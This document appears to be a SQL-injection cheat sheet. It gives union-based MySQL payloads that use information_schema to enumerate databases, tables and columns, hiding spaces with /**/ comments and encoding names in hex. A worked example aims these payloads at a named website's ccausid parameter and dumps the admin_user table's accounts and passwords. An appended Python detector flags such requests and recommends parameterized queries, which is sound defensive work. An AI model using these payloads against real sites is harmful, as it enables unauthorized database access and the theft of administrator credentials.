Query databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Query tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=[hex value of the database name]/**/limit/**/1,1

Query columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=[hex value of the table name]/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

Example:

1. Dump table names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping through the results this way, the admin_user table appeared at the fourth one.

2. Dump column names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
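Added example (not part of the original post): a Python check a defender could run over web-server query strings to flag requests of the shape shown above. It URL-decodes, replaces /**/ comments with spaces, matches UNION SELECT and information_schema access, and decodes hex literals so the schema or table name being enumerated is readable. The rule names and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed query strings in the shape of the requests above, plus one benign request.
SAMPLE_QUERIES = [
    "ccausid=13240",
    "ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/"
    "information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "ccausid=13240%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1,2,3,"
    "concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5%2F**%2FFrom%2F**%2Fadmin_user%2F**%2Flimit%2F**%2F0,1%2F*",
]

COMMENT = re.compile(r"/\*.*?\*/", re.S)  # closed inline comments used in place of spaces
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b")
RULES = {  # rule names are assumptions of this example
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b"),
    "trailing_comment": re.compile(r"(?:/\*|--|#)\s*$"),  # unterminated comment cuts off the rest
}

def normalize(query: str) -> str:
    """URL-decode, turn /**/ comments into spaces, lowercase, collapse whitespace."""
    text = COMMENT.sub(" ", unquote_plus(query))
    return re.sub(r"\s+", " ", text).lower().strip()

def analyze(query: str) -> dict:
    """Return matched rule names and multi-byte hex literals decoded to printable ASCII."""
    text = normalize(query)
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    decoded = []
    for m in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(m.group(1))
        # Skip single-byte separators such as 0x7c; keep identifiers like schema names.
        if len(raw) > 1 and all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return {"hits": hits, "decoded": decoded}

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(analyze(q), q[:60])
```

Matching on the normalized text rather than the raw request is what keeps the comment-for-space substitution and URL encoding from hiding the keywords; the lasting fix on the application side is a parameterized query for the id parameter.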